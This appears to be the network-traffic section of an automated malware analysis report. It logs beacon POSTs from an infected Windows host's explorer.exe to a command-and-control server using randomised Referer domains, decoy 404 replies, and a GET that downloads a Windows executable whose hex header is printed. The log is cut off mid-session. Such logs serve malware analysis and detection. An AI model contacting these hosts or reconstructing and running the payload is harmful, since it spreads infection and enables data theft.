                                                                                                                                                                                                  17192.168.2.749780188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.578025103 CET4924OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://yescuf.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 144
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.688508987 CET4925INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:23 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  18192.168.2.749781188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.784233093 CET4925OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://okbhh.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 217
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.892529011 CET4926INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:23 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  19192.168.2.749782188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:24.462975025 CET4927OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://ukbyppnr.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 341
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:24.569967031 CET4928INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:24 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                                                                                                                                                                                                  Nov 18, 2021 10:30:24.864259005 CET4929INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:24 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.152942896 CET4931INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:24 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  2192.168.2.749804162.159.130.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  20192.168.2.749783188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.124052048 CET4930OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://dwqvad.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 323
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.237946033 CET4932INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:25 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  21192.168.2.749784188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.347500086 CET4932OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://xjqdm.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 279
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.468919039 CET4933INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:25 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 8e 2c b4 59 52 db 03 f8 e5 2c f3 65 0c 4d eb a9 e3 1e bb 52 df 4b de fb 21 8d 24 80 ab 94 51 2d f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 45I:82OU&,YR,eMRK!$Q-~0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  22192.168.2.749785188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:26.051780939 CET4934OUTGET /files/9370_1636985686_7616.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: host-file-host0.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:26.191682100 CET4935INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:26 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  Last-Modified: Mon, 15 Nov 2021 14:14:46 GMT
                                                                                                                                                                                                  ETag: "2e400-5d0d46e5c997c"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 189440
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0d 6d 92 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 fe 01 00 00 e2 00 00 00 00 00 00 0a 20 03 00 00 00 01 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0c 01 00 57 00 00 00 00 00 03 00 7e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 48 00 00 00 00 00 00 00 00 00 00 00 49 21 26 17 0d 08 25 2b 48 d4 00 00 00 20 00 00 00 d6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 d8 fb 01 00 00 00 01 00 00 fc 01 00 00 da 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7e 08 00 00 00 00 03 00 00 0a 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 20 03 00 00 02 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELma @ `@$W~@ HI!&%+H @.text `.rsrc~@@ `.reloc@@B


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  23192.168.2.749787188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.558854103 CET5135OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://atanmkbpso.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 238
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.665591955 CET5136INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:29 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
